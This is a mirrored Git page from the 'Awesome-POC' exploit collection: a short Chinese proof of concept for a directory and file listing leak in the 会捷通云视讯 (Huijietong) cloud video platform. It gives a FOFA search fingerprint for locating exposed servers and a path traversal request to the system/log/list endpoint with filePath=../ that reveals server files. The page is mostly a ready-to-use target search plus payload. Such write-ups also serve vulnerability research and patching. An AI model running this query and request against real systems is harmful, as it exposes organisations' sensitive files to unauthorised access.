admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/会捷通云视讯 list 目录文件泄露漏洞.md
Threekiii a31ca0bb1c Web应用漏洞
2022-05-17 17:43:20 +08:00

41 lines
577 B
Markdown
Raw Blame History

# 会捷通云视讯 list 目录文件泄露漏洞
## 漏洞描述
会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息
## 漏洞影响
```
会捷通云视讯
```
## FOFA
```
body="/him/api/rest/v1.0/node/role"
```
## 漏洞复现
登陆页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101859423.png)
访问Url
```plain
/him/api/rest/V1.0/system/log/list?filePath=../
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101859690.png)
##
Reference in New Issue View Git Blame Copy Permalink